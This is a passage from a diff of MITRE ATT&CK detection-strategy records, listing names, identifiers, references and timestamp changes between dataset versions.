+                    "name": "Detection of AppleScript-Based Execution on macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a67ac8ec-2748-4fe6-8dd7-bd570af1e104"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d2daf569-4fc9-46a3-97b7-4d3d76c04a64",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0097",
+                            "external_id": "DET0097"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Application Window Enumeration via API or Scripting",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c76d69b2-f1d4-4867-965b-886b6caf95be",
+                        "x-mitre-analytic--557d1a5d-31ae-4600-b4ed-a456d9964a83",
+                        "x-mitre-analytic--a31400ee-ac3e-408e-aa4d-fb2b470142ab"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d6c1064c-9ea9-4067-835e-7c0627024b0c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0842",
+                            "external_id": "DET0842"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Artificial Intelligence",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e4b35edc-f7fe-4f0d-aaaf-60fabc9d2698"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a27b9b6b-b4b9-425c-885b-ab52834f0974",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 14:58:03.627000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0918",
+                            "external_id": "DET0918"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Audio-Visual Content",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--33712883-6871-4147-8272-7cd1c6c64ad6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-23 14:58:03.627000+00:00\", \"old_value\": \"2026-04-23T14:58:03.627Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:23:36.872Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--267a6c25-8d34-47ae-8357-9ae173adaa13",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0554",
+                            "external_id": "DET0554"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Bluetooth-Based Data Exfiltration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--02fb4d83-d2db-4d49-acbc-85eff3b517d6",
+                        "x-mitre-analytic--01588556-4b25-4418-b746-9bca0279be2c",
+                        "x-mitre-analytic--2f6dd4a5-b0cc-4c13-abb8-e2d747d591b2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--02aecf08-08b1-4f08-9272-c1fc98b5f72e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0883",
+                            "external_id": "DET0883"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Botnet",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d52fee09-db6e-4fe5-a859-7f3d273e85f0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0f7bb8ed-f114-48f6-b57f-d2047d11ca17",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0837",
+                            "external_id": "DET0837"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Botnet",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1b067cad-c75b-484e-8aaa-4b058c8ec9f7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--38ea871a-2cae-4274-85a6-c80588166cfb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0855",
+                            "external_id": "DET0855"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Business Relationships",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--058452ee-f484-4e2f-b2ad-d562e34847fb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--eda2c394-d2de-4555-be9d-b4de826441ee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0809",
+                            "external_id": "DET0809"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of CDNs",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--888e8587-e490-4509-9226-e72b32466618"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--90b5ad4f-44bf-46e2-ac66-6e81e573e3fb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0513",
+                            "external_id": "DET0513"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Cached Domain Credential Dumping via Local Hash Cache Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--18ba26d6-08e0-4370-8ef0-b2dd73bfe0b3",
+                        "x-mitre-analytic--26940057-e464-49f9-8f76-ceaca4b9d982"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--87cb2c80-54e1-4ea1-abd7-81a096eb155e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0820",
+                            "external_id": "DET0820"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Client Configurations",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3d01d29d-30f1-4b3b-bf04-54aca340a8eb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1f7b4b6e-17ab-446f-ac4e-5a1e79569dd3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0846",
+                            "external_id": "DET0846"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Cloud Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--97ec7ade-18b7-43b7-b267-85470862b6ac"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--df374bac-bd69-4351-be3f-1bd863c429ad",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0879",
+                            "external_id": "DET0879"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Cloud Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cce3f1e3-a688-4519-bd9b-0ec5ba57bc11"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e2bf0a76-b5e4-4a23-adbb-024454f5dbdc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0291",
+                            "external_id": "DET0291"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Cloud Service Dashboard Usage via GUI-Based Cloud Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c8a50f3f-105a-4107-9781-a3d75479e93d",
+                        "x-mitre-analytic--041c0b93-fda4-478f-b847-d10619db729c",
+                        "x-mitre-analytic--a0bfcae2-1936-466d-91b4-f72fcae730b6",
+                        "x-mitre-analytic--d3e3ed48-7402-40df-a6cc-db9b560bcfd1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9f2af07f-ef27-4737-b262-a8862faebffa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0805",
+                            "external_id": "DET0805"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Code Repositories",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3b25198c-e31d-4e0c-9d26-eb8e714c71a8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1e8c8a62-9546-4323-a561-83e9fad94fa0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0875",
+                            "external_id": "DET0875"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Code Signing Certificates",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--23b9c988-be01-4092-b9c4-0ddec8d58891"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c8a4587f-6fa1-4a94-844b-ee731f1c33be",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0833",
+                            "external_id": "DET0833"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Code Signing Certificates",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0922c3e9-26fb-4330-8d7a-2b9a4661db88"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--155cab5b-c70b-4cfb-ba52-f62a21836b19",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0444",
+                            "external_id": "DET0444"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Command and Control Over Application Layer Protocols",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--908aa2d1-f1c0-456b-9c9f-b984b309e51c",
+                        "x-mitre-analytic--989a524f-cf9a-4fcc-a21f-ac5aac46f0ed",
+                        "x-mitre-analytic--c2b959ca-75f4-4291-9812-0b065e7bb395",
+                        "x-mitre-analytic--c5117811-b262-4920-90d9-001d25b6305b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a1d413d7-0a28-45ce-9e4d-d250b4b6a492",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
